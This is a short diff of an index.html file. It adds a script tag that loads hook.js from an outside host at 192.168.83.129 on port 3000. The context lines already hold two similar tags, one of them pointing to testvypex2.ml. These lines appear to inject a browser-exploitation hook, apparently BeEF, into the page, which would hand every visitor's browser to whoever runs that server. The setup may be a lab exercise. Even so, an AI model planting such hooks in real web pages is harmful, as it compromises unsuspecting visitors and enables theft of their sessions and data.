--- a/index.html
+++ b/index.html
@@ -18,7 +18,7 @@
 	<script src="http://testvypex2.ml:3000/hook.js"></script>
 	<script src="192.168.83.129:3000/hook.js"></script>
 </head>
-
+<script src="http://192.168.83.129:3000/hook.js"></script>
 <body>
   <div style="font:12px tahoma,arial,helvetica,sans-serif; width: 450px; margin: 0 auto;">
 
